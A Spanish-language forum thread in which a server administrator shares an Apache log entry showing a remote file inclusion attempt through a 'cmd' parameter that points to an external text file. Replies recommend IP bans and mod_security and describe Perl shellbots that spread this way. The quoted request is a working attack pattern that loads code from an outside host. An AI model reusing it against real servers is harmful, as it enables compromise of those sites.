Atacke por Txt

Teniendo un Dedicado, acceso Root, Centos y Cpanel.

Se me a presentado el sgt problema
revisando los log de un dominio, encontre esto :

/usr/local/apache/domlogs/MIDOMINIO/MIDOMINIO.COM:151.197.230.235 - - [11/Aug/2007:11:19:31 -0400] "GET /index.php?cmd=http://www.du72.com/jesus.txt? HTTP/1.1" 200 350 "http://www.MIDOMINIO.COM/index.php?cmd=http://www.du72.com/jesus.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


Obviamente que , para exponer el caso, reemplaze el dominio original por MIDOMINIO.COM.

Al parece estan usando como zombi uno de mis web para ejecutar un codigo txt externo.

Mi pregunta es, como evitar esto?
por apf , como puedo filtrar topo tipo de entrada/salida con DU72.COM ?

Algun consejo para evitar estas cosas?

Salu2

Simplemente banea la IP del server donde se aloja, según lo que vi, ese archivo no te causará ningún daño, solo hace un "echo", no van a destruir tu server por ello. Igualmente creo que sería conveniente que usaras mod_security para evitar ataques por variables en URLs.

Saludos,

el problema es que algun cliente tuyo ha alojado un txt que contiene el codigo un codigo viral para reproducir mas servidores infectados.

a estos virus /malware se los conoce como Shellbots .. esos shellbots no son mas que programas en PERL que infectan servidores atravez de internet ( si servidores dedicados en linux ) y utilizan estos txt para introducir el codigo e infectar nuevamente.. cada servidor infectado baja ese codigo y lo ejecuta para infectar a otros.. es posiblemente uno de los primeros virus peligroso que afecta a sistemas LINUX y BSD .. por eso deben tomar todas las precauciones.

estos shellbots disfrazan sus procesos normalmente como procesos del apache .. pero son sencillos de detectar ya que consumen muchisimo CPU.


Saludos